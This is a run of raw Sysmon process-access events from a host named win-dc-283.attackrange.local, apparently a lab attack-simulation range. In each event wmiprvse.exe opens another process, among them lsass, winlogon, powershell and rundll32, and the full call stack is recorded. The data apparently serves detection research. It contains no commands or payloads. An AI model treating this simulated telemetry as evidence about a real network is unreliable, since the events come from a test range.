15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536D-6008-7306-00000000A301}7972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 